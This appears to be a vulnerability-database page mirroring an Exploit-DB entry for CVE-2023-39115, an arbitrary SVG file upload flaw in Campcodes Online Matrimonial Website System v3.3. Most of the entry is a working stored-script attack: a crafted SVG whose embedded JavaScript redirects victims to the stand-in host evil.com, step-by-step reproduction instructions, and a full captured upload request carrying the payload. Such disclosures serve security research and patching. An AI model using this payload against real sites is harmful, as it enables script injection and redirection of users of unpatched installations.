Lucene search
K

Campcodes Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload

🗓️ 04 Aug 2023 00:00:00Reported by Rajdip Dey SarkarType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 364 Views

Online Matrimonial Website System v3.3 - Arbitrary Code Execution via SVG File Uploa

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Campcodes Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload
4 Aug 202300:00
zdt
GithubExploit
Exploit for Unrestricted Upload of File with Dangerous Type in Campcodes Complete_Online_Matrimonial_Website_System_Script
7 Aug 202316:04
githubexploit
ATTACKERKB
CVE-2023-39115
16 Aug 202315:15
attackerkb
Circl
CVE-2023-39115
16 Aug 202322:50
circl
CNNVD
Campcodes Online Matrimonial Website System Code Issue Vulnerability
4 Aug 202300:00
cnnvd
CVE
CVE-2023-39115
16 Aug 202300:00
cve
Cvelist
CVE-2023-39115
16 Aug 202300:00
cvelist
EUVD
EUVD-2023-42861
3 Oct 202520:07
euvd
NVD
CVE-2023-39115
16 Aug 202315:15
nvd
OSV
CVE-2023-39115
16 Aug 202315:15
osv
Rows per page
# Exploit Title: Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload
# Date: 3-8-2023
# Category: Web Application
# Exploit Author: Rajdip Dey Sarkar
# Version: 3.3
# Tested on: Windows/Kali
# CVE: CVE-2023-39115



Description:
----------------

An arbitrary file upload vulnerability in Campcodes Online Matrimonial
Website System Script v3.3 allows attackers to execute arbitrary code via
uploading a crafted SVG file.


SVG Payload
------------------

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
   <script type="text/javascript">
      alert("You have been hacked!!")


      window.location.href="https://evil.com"
   </script>
</svg>


Steps to reproduce
--------------------------

 -Login with your creds
 -Navigate to this directory - /profile-settings
 -Click on Gallery -> Add New Image -> Browser -> Add Files
 -Choose the SVG file and upload done
 -Click the image!! Payload Triggered


Burp Request
-------------------

POST /Matrimonial%20Script/install/aiz-uploader/upload HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
Content-Type: multipart/form-data;
boundary=---------------------------167707198418121100152548123485
Content-Length: 1044
Origin: http://localhost
Connection: close
Referer: http://localhost/Matrimonial%20Script/install/gallery-image/create
Cookie: _session=5GnMKaOhppEZivuzZJFXQLdldLMXecD1hmcEPWjg;
acceptCookies=true; XSRF-TOKEN=I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="relativePath"

null
-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="name"

file (1).svg
-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="type"

image/svg+xml
-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="aiz_file"; filename="file (1).svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
   <script type="text/javascript">
      alert("You have been hacked!!")


      window.location.href="https://evil.com"
   </script>
</svg>
-----------------------------167707198418121100152548123485--

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation